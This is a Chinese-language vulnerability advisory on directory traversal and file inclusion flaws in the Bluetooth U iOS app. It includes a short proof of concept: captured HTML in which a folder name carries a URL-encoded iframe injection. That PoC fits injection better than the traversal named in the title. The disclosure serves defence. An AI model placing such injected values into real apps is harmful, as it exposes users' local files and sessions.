Bluetooth U 'New Folder - Index'模块多个目录遍历漏洞
Bluetooth U 'New Folder - Index'模块多个目录遍历漏洞
发布日期:2013-10-17
更新日期:2013-10-20
受影响系统:
Apple Bluetooth U - Mobile Web Application
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63194
Bluetooth U可确保设备之间文件传输的同步性,而不限制文件类型。
Bluetooth U v1.2.0 iOS移动应用(Apple iOS - iPad & iPhone)存在多个本地目录遍历及文件包含漏洞,远程攻击者通过含特制目录遍历序列的请求,利用此漏洞检索应用上下文中的本地文件。
<*来源:Benjamin Kunz Mejri
链接:http://seclists.org/bugtraq/2013/Oct/81
http://www.vulnerability-lab.com/get_content.php?id=1111
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
The path/directory-traversl web vulnerability can be exploited by remote attackers without privileged application user
account and also
without user interaction. For demonstration or reproduce ...
PoC: Foldername - Index File Dir Listing (Wifi)
<table id="tableContent" border="0" cellpadding="0" cellspacing="0">
<thead>
<tr><th style="padding-left:10px;"><input id="selecteAll" onclick="selectAll(this)"
type="checkbox"></th><th>Name</th><th>Size</th><th>Modified Date</th><th class="del">Delete</th></tr>
</thead>
<tbody id="filelist"><tr><td>
<input name="chxItem"
value="%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E"
onclick="selChkItem(this)" type="checkbox"></td>
<td><a
href="/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E
?guid=1520475B-0653-41FA-8072-CC31D2C5A8F2&type=child" class="file"><span style="vertical-align:middle;"><img
src="/Folder.png"
style="border:0;vertical-align:middle" ;=""></span><iframe src="?guid=&type=list&password=&date=Sun" oct="" 13=""
2013=""
17:46:15="" gmt+0200=""></a></td><td></td><td>2013-10-13 17:53:31</td><td><input name="commit" type="button"
value="Delete"
onclick="DelegateData('/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E'
,'1520475B-0653-41FA-8072-CC31D2C5A8F2');" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr><tr
class="shadow">
<td><input name="chxItem" value="TEST23" onclick="selChkItem(this)" type="checkbox"></td>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://itunes.apple.com/de/app/bluetooth-u-share-files-photo/id526268815
评论暂时关闭